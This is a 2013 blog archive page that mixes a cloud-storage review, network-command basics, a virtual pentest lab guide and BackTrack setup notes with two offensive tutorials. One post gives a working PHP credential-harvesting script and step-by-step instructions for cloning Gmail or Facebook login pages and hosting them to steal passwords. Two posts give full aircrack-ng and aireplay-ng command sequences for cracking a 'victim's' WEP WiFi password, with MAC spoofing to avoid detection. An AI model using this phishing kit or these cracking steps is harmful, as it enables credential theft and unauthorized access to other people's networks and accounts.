Showing posts with label INTERNET. Show all posts
Showing posts with label INTERNET. Show all posts

Saturday, December 14, 2013

Manage Dropbox, Google Drive, SkyDrive & More From One Place With MultCloud


Using a large number of cloud storage services can lead to the nuisance of not being able to manage each of them efficiently. That’s where services like MultCloud aim to offer a handy solution by letting your control and manage your cloud accounts from one unified interface. Based entirely online, it lets you create a MultCloud profile, to which you can connect your other cloud storag services for easy access and management. The service currently supports most major cloud storage providers including Dropbox, SugarSync, Google Drive, SkyDrive, Box and Amazon S3.


MultCloud is quite easy to configure, and takes only a couple of minutes  for setting things up. It doesn’t require you to enter a lot of details – just your email address, name and password would do. Once you visit the website (via the link provided at the end of this post), you can click the ‘Create An Account’ button to get started. Once an account has been created, just make sure to verify your email address with the service from the link provided in the confirmation email that’s sent to your inbox.

MultCloud - one app for simultaneous management of your multiple cloud drives

Next, you just need to enter your email address and password at the login screen after the verification to finally log in to your account – it’s simple as that.

2013MultCloud Login

While design isn’t the main focus of the app, but it’s still pretty well crafted. The fine-looking interface of the dashboard makes the service fairly intuitive to use. From the dashboard, you can add the cloud drives of your choice to the service. To do that, simply choose one of the services from the available options, specify a display name for it, and click Add. After that, you will need to sign in to the service with your account (if you aren’t signed in already) and authorize MultCloud with the appropriate permissions when prompted.

MultCloud - Put multiple cloud drives into one.

Once a cloud service account has been added, you can do pretty much everything from it that could possibly be done from a dedicated client or web interface of that service. For example, you can easily view contents of your cloud storage, upload files to it, download existing cloud files to your local storage, and create new folders. MultCloud also offers a preview feature for some files such as images. Other than that, you can rename your files and copy and move them between different cloud folders.

GDrive

Overall, MultCloud is a great service that keeps things simple while taking the hassle of controlling all your cloud accounts from different browser tabs or desktop clients out of the way. The service is currently available for free.
Visit MultCloud
http://www.multcloud.com/

Thursday, November 28, 2013

Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.



For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.



So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name login.htm .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-


<?php

header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php

Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".

Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.

Hacking a WEP key with airodump on Ubuntu

WEP key can easily be cracked with a simple combination of tools on Linux machine. The WEP cracking is made easier by the flaws in the design of the WEP encryption that makes it so vulnerable.



These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro.


These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions.

The hack starts-


Install aircrack-ng – on Debian Etch by:

DOWNLOAD aircrack.ng HERE
http://adf.ly/aiZi8


sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:


sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.


A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

Wednesday, November 27, 2013

Network Hacking Using Command Prompt


-: Network Hacking :-


Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com

example:- c:/>ping www.google.com


Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n



Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert fbtghana.blogspot .com



Here "*    *    *    Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.



Set up your Pen Testing/Hacking Lab Network using a Single System


Contents

  • Introduction
  • Installation & Configuration
  • Installing Applications on Virtual Machine
  • Advantages of Virtual Machine
  • Take Backup & Save Trouble in Future
  • Disable the windows Firewall
  • Testing your Pen-Testing/Hack Network
  • References
  • Conclusion
Introduction

There are lots of tutorials available on the internet related to hacking but the big problem lies in testing your theoretical skills. Unless you don't have practical exposure to hacking, you cannot really understand the strength of it. The technique I will discuss here will be advantageous for those who have only single system and want to set up a testing network using it. In case you have multiple systems then you can easily test for your skills by making one system as target and other as attacker.
But what to do when we have only a single system at our disposal. Need not to worry. Virtual machine is the ultimate solution. You can set up your own hacking network and apply your skills to gain practical exposure to hacking.
Installation & Configuration
The only thing to look for is your systems hardware configuration. You should have minimum 2 GB RAM but it is highly recommended to use 3 GB RAM for a 32 bit operating system.

We will be using Oracle VirtualBox in this tutorial. You can download virtualbox from this link [Reference 1].  Once you have installed Vbox, the next step is to download the Extensions pack. You can get it from this link [Reference 2]

Once you have followed these initial steps, you are half done. The next step is to setup a target operating system. Suppose you want to set WINDOWS XP SP2 as the target operating system. You will need a bootable Windows XP SP2 iso for that. You can easily download it from Microsoft website or torrent. You can refer to this quick video tutorial on how to setup a virtual machine using VBox and WIN XP.
Installing Applications on Virtual Machine

So now you have a virtual machine where you can test all your applications and hacks. Let us install a WAMP server and run DVWA over it. For those who are not aware of DVWA can check this link [Reference 3]

How to install applications on a virtual machine? Well the process is simple. When your Windows XP Virtual machine is running, then click on the DEVICE tab, move to USB and select your pendrive from the list.
Now you can install anything from a USB drive inside your virtual machine. There is also a facility to create shared folder with your host operating system but I would prefer that you use USB. Shared folder has some issues when your host operating system is Windows 7. You can install different servers, applications, RAT clients etc and play with it.
Advantages of Virtual Machine
Here are some of the major advantages of using virtual machine.
  • You can test all the viruses and RATs without any fear as your base operating system will not be affected.
  • You can test different servers and applications easily without affecting your base operating system.
  • In case the Virtual machine gets corrupt then you can re-install it.
Take Backup & Save Trouble in Future
There are also some key factors that you should remember which will help you during your pentesting:
  • Create a clone of the virtual machine
  • This step is very helpful in case your VM gets corrupt. Creating a clone of it will prevent you from re-installing it again and again.
  • You can create a clone by Right clicking on the Virtul machine instance in VBox and click on "clone.."
  • You will notice that a cloned virtual WinXP will be created for you.
Disable the Windows Firewall
The next important thing you can do is disable the windows firewall and then perform your pentesting as the firewall may block some of the suspicious activities. Using the default Windows firewall of XP virtual machine you can also test whether your activity is traceable or not. This will give you a clear understanding why RATs are not considered as a suitable hack these days because they are easily detectable. You can disable the firewall by going to control panel, clicking on Firewall and then disable it.

In this way you can set up a suitable environment for your home experiments.
Testing your Pen-Testing/Hack Network
Well a good question to ask if you have understood the above concepts. So far we discussed how to test different tools and techniques on a virtual operating system. The next step will be how to hack one virtual machine using the other. The scenario will be similar to hacking any system on internet so this technique will give you a real time exposure.

Interesting... Lets proceed then. This time we will set up another virtual machine using BackTrack [Reference 4] operating system which is one of the most widely used penetration testing operating system by security professionals.

The reason which makes Backtrack so popular is:
  • It has all the relevant tools pre-installed
  • It is linux based.
You can download the Backtrack 5 iso from its official website. Its a must have operating system for all. You can follow this simple video to install BT on virtualbox.
DOWNLOAD backtrack HERE
 http://www.backtrack-linux.org/downloads/
 
 
Once you are done with the installation part, the next step is to make the two virtual machines (BT and WinXP) connect with each other. There is a simple setting that you will have to make in both the virtual machines. Let's check it out.

Select the Backtrack virtual machine, then click on settings tab, then move to "network" settings. You will find that "Adapter 1" is set to NAT adapter. Switch to the "Adapter 2" tab.
In the Adapter2 tab, set the adapter as "Host-Only Adapter". Set the name of adapter as "VirtualBox Host Only Ethernet Adapter" . See the figure.
Make similar setting changes in your windows XP virtual machine as well. Now your two virtual machines are ready to connect with each other. You can check the IP address of Windows machine by using the ipconfig command in the command prompt and similarly you can check the IP address of the BT machine using the ifconfig command. Also you can ping the two machines to check if both are detecting each other (don't forget to disable the windows firewall else it will filter the ping data packets).

The following image shows my two virtual machines. One is WinXP and other is BT5 with there corresponding ip addresses. Both are running ovr my host operating system Win7. So in all there are 3 operating systems running simultaneously.
Now you can use various options available in Backtrack OS to perform tests on the WinXP box. Let us quickly perform an nmap scan to check the open ports on WinXP machine.
As you can see that the target is up and has some open ports as well. Similarly you can perform several attacks and use the tools available in Backtrack to penetrate the target windows XP machine without harming your own operating system.

You can use this technique to perform several tests like,
  • You can try to hack different operating systems by installing them as a virtual machine.
  • This will have a real time simulation of original scenario.
  • You can increase the level of difficulty of your hacks by installing firewalls, IDS/IPS etc.
  • This is a self customization scenario where you can do what ever you want
References

  1. VirtualBox - Powerful x86 and AMD64/Intel64 virtualization product
  2. Extension pack for Virtual Box.
  3. Installing and working with DVWA.
  4. BackTrack - Popular Live Security Distribution for Penetration Testing
    Conclusion

    This is just a quick example for you all to get started with using VM's for pentesting and hacking. You can further take this tutorial to next level by experimenting with various flavors of operating systems and try your hands on them.

    This can be like a practice battlefield for you before you dive deep into the real fight.

    Basic Usage of BackTrack

    Logging in to BackTrack

    Once the installation of BackTrack is done, the default username and password required to log in are root / toor.
    NOTE: You will not be able to see the password as you type it.

    Starting a GUI Environment

    After you are logged in you can start the GUI Environment by issuing the startx command.

    X wont start!

    In rare occasions (such as after a VMware tools install, or when using unsupported Video cards), X will refuse to start. If that happens you have several options you can try in order to fix the issue:
    • Reconfiguring the X server package, you can reset (and often fix) Xorg configurations with the following command:
       root@bt:~# dpkg-reconfigure xserver-xorg
    • If you are using Backtrack 5 on x64 with KDE you should try the following:
       root@bt:~# rm /root/.kde/cache-*

    NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing the following command:
       root@bt:~# rm -rf /var/tmp/kdecache-*

    Getting Networking to work

    If you haven’t noticed yet BackTrack does not boot with networking by default in order to increase its stealth.

    Setting your IP manually

    We will first set up the networking manually. In the following example we will assume the following addresses and their purpose:
       IP Address      -  192.168.1.112/24
    Default Gateway - 192.168.1.1
    DNS server - 192.168.1.1
    In order to set these up we will run the following commands:
    root@bt:~# ifconfig eth0 192.168.1.112/24
    root@bt:~# route add default gw 192.168.1.1
    root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf


    Getting a static IP to stick between reboots

    These settings however will only last until you reboot, so if we want to save them between reboots we need to edit the /etc/network/interfaces file like this:
    # This file describes the network interfaces available on your system
    # and how to activate them. For more information, see interfaces(5).

    # The loopback network interface
    auto lo
    iface lo inet loopback

    # The primary network interface
    auto eth0
    iface eth0 inet static
    address 192.168.1.112
    netmask 255.255.255.0
    network 192.168.1.0
    broadcast 192.168.1.255
    gateway 192.168.1.1
    Edit the file as appropriate, then have the network come up automatically at boot time:
    root@bt:~# update-rc.d networking defaults
    root@bt:~# /etc/init.d/networking restart

    Getting an IP from DHCP

    In order to get an IP from a DHCP server we can issue the dhclient <interface> command as follows:
    root@bt:~# dhclient eth0
    Internet Systems Consortium DHCP Client V3.1.1
    Copyright 2004-2008 Internet Systems Consortium.
    All rights reserved.
    For info, please visit http://www.isc.org/sw/dhcp/

    Listening on LPF/eth0/00:0c:29:81:74:21
    Sending on LPF/eth0/00:0c:29:81:74:21
    Sending on Socket/fallback
    DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
    DHCPACK of 192.168.1.112 from 192.168.1.1
    bound to 192.168.1.112 -- renewal in 37595 seconds.
    root@bt:~#

    Using the script to start networking

    There is a script to start networking in the /etc/init.d directory which attempts to start every interface listen in /etc/network/interfaces (you can remove the ones you don’t need). To start it issue the following command:
    root@bt:~# /etc/init.d/networking start

    WICD Network Manager

    Another way to set up your networking is using the WICD Network Manager, you can find it in the menu:
    Menu > Internet > Wicd Network Manager
    NOTE: Notice that when starting WICD you will get an error:

    Wicd error.png

    In order to get rid of this error you have to reboot Backtrack, than BEFORE starting WICD open up a terminal and type in the following:
    root@bt:~# dpkg-reconfigure wicd
    root@bt:~# update-rc.d wicd defaults
    Now after a reboot the error should not occur anymore.

    Changing the root password

    As you know Backtrack comes with a default username and password (root/toor) it is IMPORTANT that we change that root password especially when running services such as SSH. We can change the password by issuing the passwd command:
    root@bt:~# passwdEnter new UNIX password: {enter your new password here } Retype new UNIX password: {enter your new password again} passwd: password updated successfully root@bt:~#


    Starting services

    BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all disabled by default. To start a service such as SSH, you can use the service init scripts. For example, to start the SSH service:
    root@bt:~# sshd-generate  # Specific to the SSH service - needed to generate SSH keys
    root@bt:~# /etc/init.d/ssh start
    Starting OpenBSD Secure Shell server: sshd.
    root@bt:~# /etc/init.d/ssh stop
    Stopping OpenBSD Secure Shell server: sshd.
    root@bt:~#
    When using a ssh server for the first time on Backtrack you will need to generate keys:
    root@bt:~# sshd-generate
    To enable a service at boot time, you can use the update-rc.d command, for example, having SSH start at boot time:
    root@bt:~# update-rc.d -f ssh defaults
    Adding system startup for /etc/init.d/ssh ...
    /etc/rc0.d/K20ssh -> ../init.d/ssh
    /etc/rc1.d/K20ssh -> ../init.d/ssh
    /etc/rc6.d/K20ssh -> ../init.d/ssh
    /etc/rc2.d/S20ssh -> ../init.d/ssh
    /etc/rc3.d/S20ssh -> ../init.d/ssh
    /etc/rc4.d/S20ssh -> ../init.d/ssh
    /etc/rc5.d/S20ssh -> ../init.d/ssh
    root@bt:~#


    Common apt commands

    apt-get install <package> Downloads <package> and all of its dependencies, and installs or upgrades them.
    apt-get remove [--purge] <package> Removes <package> and any packages that depend on it. --purge specifies that packages should be purged.
    apt-get update Updates packages listings from the repo, should be run at least once a week.
    apt-get upgrade Upgrades all currently installed packages with those updates available from the repo. should be run once a week.
    apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.
    apt-cache search <pattern> Searches packages and descriptions for <pattern>.
    apt-cache show <package> Shows the full description of <package>.
    apt-cache showpkg <package> Shows a lot more detail about <package>, and its relationships to other packages.
    man apt Will give you more info on these commands as well as many that are in less common usage.


    Common dpkg commands

    dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for example.
    dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.
    dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.
    dpkg -r <package> Removes an installed package named <package>
    dpkg -P <package> Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.
    dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.
    dpkg -s <package> Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.
    dpkg-reconfigure <package> Reconfigures an installed package
    man dpkg Will give you more info on these commands as well as many that are in less common usage.


    How do I find more information on a particular command or programs usage ?

    Most commands will have what is called a man page (manual page) which can be viewed by typing:
    root@bt:~# man <command you want more info on>
    Another very good resource on linux command usage can be found at linuxcommand.org
    Some programs do not have a man page, but you can usually get more information on it's usage by typing:
    root@bt:~# <program name> Just the program name without any arguements.
    or
    root@bt:~# <program name> -help
    or
    root@bt:~# <program name> --help
    or
    root@bt:~# <program name> -h
    Some programs use other methods, but they are usually just a variation of one of the above five commands.

    Learn how to Hack Wifi Password

    http://www.backtrack-linux.org/downloads/
    This tutorial teaches you how to hack wifi passowrd in just 10 to 15 minutes. This tutorial explains How to Hack or Crack Wifi Password. This hack will work on hacking WEP encryption password.
    So guys tighten your belts for new hack and lets start hack wifi.


    STEPS TO HACK WIFI OR WIRELESS PASSWORD

    1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt). (FREE !!)
    Download Backtrack Linux Live CD from here: http://www.backtrack-linux.org/downloads/


    2. SCAN TO GET THE VICTIM

    Get the victim to attack that is whose password you want to hack or crack.
    Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a "CONSOLE" . Now you should start your Wifi card. To do it so type

    airmon-ng

    You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type

    airmon-ng stop ath0

    then type:

    ifconfig wifi0 down

    then type:

    macchanger --mac 00:11:22:33:44:55 wifi0

    then type:

    airmon-ng start wifi0

    The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

    Now type:

    airodump-ng ath0


    Now you will see a list of wireless networks in the Console. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.
    Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.



    3. SELECTING NETWORK FOR HACKING

    Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.



    Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --

    00:23:69:bb:2d:of

    The Channel number will be under a heading that says "CH".


    Now in the same CONSOLE window type:

    airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


    The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember.

    Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.

    Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.


    4. Cracking the WEP password

    Now leave this Console window up and running and open up a 2nd console window.
    In this window type:

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

    This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)"

    If this happens, then good! You are almost there.

    Now type:
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

    This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Console window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

    Now you need to open up a 3rd and final console window. This will be where we actually crack the password.
    Now type:
    aircrack-ng -b (bssid) (filename)-01.cap

    Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
    Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000."
    DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

    If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

    Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
    se:cr:et

    This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
    0F:KW:94:27:VF


    Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

    It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

    I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.